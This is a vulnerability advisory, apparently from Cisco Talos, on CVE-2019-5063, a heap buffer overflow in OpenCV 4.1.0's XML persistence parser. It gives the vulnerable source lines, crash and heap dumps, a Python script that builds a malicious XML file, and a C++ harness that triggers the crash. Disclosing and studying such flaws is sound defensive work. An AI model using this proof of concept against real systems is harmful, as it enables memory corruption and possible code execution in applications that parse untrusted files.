Talos Vulnerability Report

TALOS-2019-0852

OpenCV XML Persistence Parser Buffer Overflow Vulnerability

January 2, 2020
CVE Number

CVE-2019-5063

Summary

An exploitable heap buffer overflow vulnerability exists in the data structure persistence functionality of OpenCV 4.1.0. A specially crafted XML file can cause a buffer overflow, resulting in multiple heap corruptions and potential code execution. An attacker can provide a specially crafted file to trigger this vulnerability.

Tested Versions

OpenCV 4.1.0

Product URLs

https://opencv.org/
https://github.com/opencv/opencv

CVSSv3 Score

8.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE

CWE-120 - Buffer Copy without Checking Size of Input (‘Classic Buffer Overflow’)

Details

OpenCV was originally developed in 1999 by Intel Research and is currently maintained by the non-profit organization OpenCV.org. OpenCV is used in a myriad of ways, including facial recognition, robotics, motion tracking and various machine learning applications.

This particular vulnerability is present in the “persistence” mode of OpenCV that allows a developer to write and retrieve OpenCV data structures to/from a file on disk. The file type can be XML, YAML or JSON.

When the parser encounters an ampersand while parsing an XML file containing a potential character entity reference, it continues to consume alphanumeric characters until it reaches a non-alphanumeric character, which must be a semicolon. If the resulting name does not match one of the predefined entity names (lt, gt, amp, apos, quot) tested in the if/else chain, the data is instead copied to a buffer as is.

In persistence_xml.cpp, we can see the definition of the buffer that will be overflowed. It is a member of the XMLParser class (a subclass of FileStorageParser), whose instances reside on the heap:

char strbuf[CV_FS_MAX_LEN+16];

Where persistence.hpp defines CV_FS_MAX_LEN as:

#define CV_FS_MAX_LEN 4096

Therefore, our buffer size is 0x1010 (4112) bytes in length. The overflow occurs during the following parsing routine within persistence_xml.cpp:

583                             else if( c == '&' )
584                             {
585                                 if( *++ptr == '#' )
586                                 {
587                                     int val, base = 10;
588                                     ptr++;
589                                     if( *ptr == 'x' )
590                                     {
591                                         base = 16;
592                                         ptr++;
593                                     }
594                                     val = (int)strtol( ptr, &endptr, base );
595                                     if( (unsigned)val > (unsigned)255 ||
596                                        !endptr || *endptr != ';' )
597                                         CV_PARSE_ERROR_CPP( "Invalid numeric value in the string" );
598                                     c = (char)val;
599                                 }
600                                 else
601                                 {
602                                     endptr = ptr;
603                                     do c = *++endptr;
604                                     while( cv_isalnum(c) );
605                                     if( c != ';' )
606                                         CV_PARSE_ERROR_CPP( "Invalid character in the symbol entity name" );
607                                     len = (int)(endptr - ptr);
608                                     if( len == 2 && memcmp( ptr, "lt", len ) == 0 )
609                                         c = '<';
610                                     else if( len == 2 && memcmp( ptr, "gt", len ) == 0 )
611                                         c = '>';
612                                     else if( len == 3 && memcmp( ptr, "amp", len ) == 0 )
613                                         c = '&';
614                                     else if( len == 4 && memcmp( ptr, "apos", len ) == 0 )
615                                         c = '\'';
616                                     else if( len == 4 && memcmp( ptr, "quot", len ) == 0 )
617                                         c = '\"';
618                                     else
619                                     {
620                                         memcpy( strbuf + i, ptr-1, len + 2 );
621                                         i += len + 2;
622                                     }
623                                 }

The overflow occurs at line 620. The destination buffer has a fixed size, but the size passed to memcpy is derived from the length of the entire XML entity name (computed at line 607) without checking whether the copy extends beyond the end of the target buffer.
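The scan and length calculation described above can be modeled in a few lines of Python. This is only a sketch of the logic at lines 602 to 621, not OpenCV code: the function names entity_copy_length and fits_in_strbuf are hypothetical, and the bounds check shown is an illustration of the missing test, not the vendor's actual patch.

```python
CV_FS_MAX_LEN = 4096
STRBUF_SIZE = CV_FS_MAX_LEN + 16  # 4112 bytes, per the report

# The five entity names the parser recognizes (lines 608-617).
KNOWN_ENTITIES = {b"lt", b"gt", b"amp", b"apos", b"quot"}


def entity_copy_length(data: bytes, amp_index: int) -> int:
    """Return the memcpy size used for an unknown entity, or 0 for a known one.

    Models lines 602-621: ptr points one past '&', endptr is advanced
    before each test (do/while), and the copy spans '&' through ';'.
    """
    ptr = amp_index + 1
    endptr = ptr
    while True:
        endptr += 1
        c = data[endptr:endptr + 1]  # empty bytes at end of input
        if not c.isalnum():          # ASCII-only test for bytes objects
            break
    if c != b";":
        raise ValueError("Invalid character in the symbol entity name")
    length = endptr - ptr
    if data[ptr:endptr] in KNOWN_ENTITIES:
        return 0                     # no memcpy on the known-entity paths
    return length + 2                # memcpy(strbuf + i, ptr - 1, len + 2)


def fits_in_strbuf(i: int, copy_len: int) -> bool:
    """Hypothetical bounds check that the vulnerable code path lacks."""
    return i + copy_len <= STRBUF_SIZE


# Same payload shape as the proof of concept in this report.
poc = b"string & " + b"B" * 0x2C80 + b";"
n = entity_copy_length(poc, poc.index(b"&"))
print(hex(n), fits_in_strbuf(0, n))
```

For the proof-of-concept payload, the modeled copy length matches the n value of 0x2c83 observed in the crash, and the hypothetical check rejects it. Note that the character immediately after the ampersand is never tested by the do/while loop, which is why the space in the payload does not stop the scan.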

Crash Information

We can see the vulnerable memcpy operation occur here:

0x41f71f    call   memcpy@plt <0x406470>
    dest: 0x91c380 ◂— 0x676e69727400
    src: 0x911e15 ◂— 0x4242424242422026 ('& BBBBBB')
    n: 0x2c83

The buffer is only 0x1010 (4112) bytes long, but the memcpy size (the full length of the entity reference string) is 0x2c83 (11395) bytes. The copy therefore overflows into subsequent heap objects, leading to potential code execution.

The destination buffer is located within the XMLParser object itself, which derives from FileStorageParser:

type = class cv::XMLParser : public cv::FileStorageParser {
  public:
    cv::FileStorage_API *fs;
    char strbuf[4112];

    XMLParser(cv::FileStorage_API *);
    virtual ~XMLParser(void);
    char * skipSpaces(char *, int);
    virtual bool getBase64Row(char *, int, char *&, char *&);
    char * parseValue(char *, cv::FileNode &);
    char * parseTag(char *, std::__cxx11::string &, std::__cxx11::string &, int &);
    virtual bool parse(char *);
} *

In this particular case, the heap object for this instance is located at 0x91c350. The buffer is located at 0x91c380.

Heap chunk: 0x91c358 (malloc address)
Heap chunk header: 0x91c350
             Size: 0x1040 (4160)
         Size+Hdr: 0x1050 (4176)
           Status: in USE
  Prev size field: 0x0 (0)
         Raw Size: 0x1041 (4161)
            Flags: PREV_INUSE

 000000000091c340: 00 40 00 00 00 00 00 00  00 00 00 00 00 00 00 00 .@..............
 000000000091c350: 00 00 00 00 00 00 00 00  41 10 00 00 00 00 00 00 ........A.......
 000000000091c360: 48 3f 8e 00 00 00 00 00  01 00 00 00 01 00 00 00 H?..............
 000000000091c370: 98 3f 8e 00 00 00 00 00  60 04 91 00 00 00 00 00 .?......`.......
                                         ....
 000000000091d380: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ................
 000000000091d390: 00 00 00 00 00 00 00 00  21 00 00 00 00 00 00 00 ........!.......

The next object in the heap is located at 0x91d390, which is exactly 0x1040 (4160) bytes after the chunk header at 0x91c350:

Heap chunk: 0x91d398 (malloc address)
Heap chunk header: 0x91d390
             Size: 0x20 (32)
         Size+Hdr: 0x30 (48)
           Status: in USE
  Prev size field: 0x0 (0)
         Raw Size: 0x21 (33)
            Flags: PREV_INUSE

 000000000091d380: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ................
 000000000091d390: 00 00 00 00 00 00 00 00  21 00 00 00 00 00 00 00 ........!.......
                                         ....
 000000000091d3a0: 00 73 74 72 69 6e 67 73  00 00 00 00 00 00 00 00 .strings........
 000000000091d3b0: 00 00 00 00 00 00 00 00  51 1c 00 00 00 00 00 00 ........Q.......

Here are the objects after the memcpy() operation:

Heap chunk: 0x91c358 (malloc address)
Heap chunk header: 0x91c350
             Size: 0x1040 (4160)
         Size+Hdr: 0x1050 (4176)
           Status: is FREE
               FD: 0x8e3f48
               BK: 0x100000001
  Prev size field: 0x0 (0)
         Raw Size: 0x1041 (4161)
            Flags: PREV_INUSE

 000000000091c340: 00 40 00 00 00 00 00 00  00 00 00 00 00 00 00 00 .@..............
 000000000091c350: 00 00 00 00 00 00 00 00  41 10 00 00 00 00 00 00 ........A.......
 000000000091c360: 48 3f 8e 00 00 00 00 00  01 00 00 00 01 00 00 00 H?..............
 000000000091c370: 98 3f 8e 00 00 00 00 00  60 04 91 00 00 00 00 00 .?......`.......
                                         ....
 000000000091d380: 42 42 42 42 42 42 42 42  42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
 000000000091d390: 42 42 42 42 42 42 42 42  42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB

The heap object at 0x91d390 has clearly been corrupted.

0x91d390:	0x4242424242424242	0x4242424242424242
0x91d3a0:	0x4242424242424242	0x4242424242424242
0x91d3b0:	0x4242424242424242	0x4242424242424242
0x91d3c0:	0x4242424242424242	0x4242424242424242
0x91d3d0:	0x4242424242424242	0x4242424242424242
0x91d3e0:	0x4242424242424242	0x4242424242424242
0x91d3f0:	0x4242424242424242	0x4242424242424242
0x91d400:	0x4242424242424242	0x4242424242424242
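The corruption shown above follows directly from the addresses in this report. The short calculation below is a sketch that assumes the copy starts at the beginning of strbuf, as the dest value of the memcpy call suggests; the constant names are illustrative only.

```python
# Values taken from the debugger output in this report.
STRBUF_ADDR = 0x91C380        # memcpy destination / start of strbuf
STRBUF_SIZE = 4096 + 16       # CV_FS_MAX_LEN + 16 = 0x1010
COPY_LEN = 0x2C83             # memcpy size argument
NEXT_CHUNK_HEADER = 0x91D390  # header of the following heap chunk

# Address of the first byte past the end of strbuf.
strbuf_end = STRBUF_ADDR + STRBUF_SIZE

# Bytes written beyond the buffer, assuming the copy starts at offset 0.
overflow_bytes = COPY_LEN - STRBUF_SIZE

print(hex(strbuf_end), overflow_bytes)
```

Under that assumption, the buffer ends exactly where the next chunk header begins, so the first byte written out of bounds already lands in the metadata of the neighboring chunk, and roughly 7 KB of attacker-controlled data follow it.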

The heap segment extends from 0x8f9000 to 0x91f000 (in this instance). This specific variant of the attack will trigger an access violation because an attempt to copy data beyond the heap segment will occur.

0x8f9000           0x91f000 rw-p    26000 0      [heap]


Program received signal SIGSEGV, Segmentation fault.
__memmove_sse2_unaligned_erms () at ../sysdeps/x86_64/multiarch/memmove-vec-unaligned-erms.S:481
481		VMOVU	%VEC(8), (%r11)
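The access violation can also be checked with simple address arithmetic. This sketch uses only the values printed above (the memcpy destination and size, and the heap mapping); the variable names are illustrative.

```python
# Values taken from the memcpy call and the heap mapping in this report.
DEST = 0x91C380
COPY_LEN = 0x2C83
HEAP_START = 0x8F9000
HEAP_END = 0x91F000  # first address past the mapped heap segment

# Address one past the last byte the copy would write.
copy_end = DEST + COPY_LEN

# Positive means the copy runs off the end of the heap mapping.
bytes_past_heap = copy_end - HEAP_END

print(hex(copy_end), bytes_past_heap)
```

With this payload the copy would end at 0x91f003, a few bytes past the end of the mapping, which is consistent with the SIGSEGV raised inside memmove. A slightly shorter entity name would stay inside the mapped heap and corrupt neighboring objects without crashing immediately.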

Exploit Proof of Concept

Generate a malicious XML file:

#!/usr/bin/env python
# Builds poc.xml: an unrecognized entity reference far longer than strbuf.

poc = b'<?xml version="1.0"?><opencv_storage><strings>'
poc += b'string'
poc += b' & '
poc += b'B' * 0x2c80

# Required: the parser only reaches the memcpy if the entity ends with ';'
poc += b';'
poc += b'</strings>'
with open("poc.xml", "wb") as f:
    f.write(poc)

Compile the harness to load the file:

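/*
 * harness.cpp
 * g++ -I/usr/include/opencv4/ harness.cpp -o harness -l opencv_core
 */
#include "opencv2/core.hpp"

int main(int argc, char** argv) {
    if (argc < 2) {
        return 1;  // usage: ./harness <file>
    }
    // Opening the file for reading runs the XML parser on its contents.
    cv::FileStorage fs2(argv[1], cv::FileStorage::READ);
    fs2.release();
    return 0;
}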

Execution:

$ ./harness poc.xml
[1] 24290 segmentation fault (core dumped) ./harness poc.xml

Timeline

2019-07-22 - Initial contact
2019-07-30 - Plain text report issued
2019-10-02 - 60+ day follow up
2019-10-21 - 90 day follow up
2019-11-13 - Vendor confirmed fix planned for December 2019 release
2019-12-12 - Talos granted extension to public disclosure deadline
2019-12-19 - Vendor patched
2020-01-02 - Public Release

Credit

Discovered by Dave McDaniel of Cisco Talos.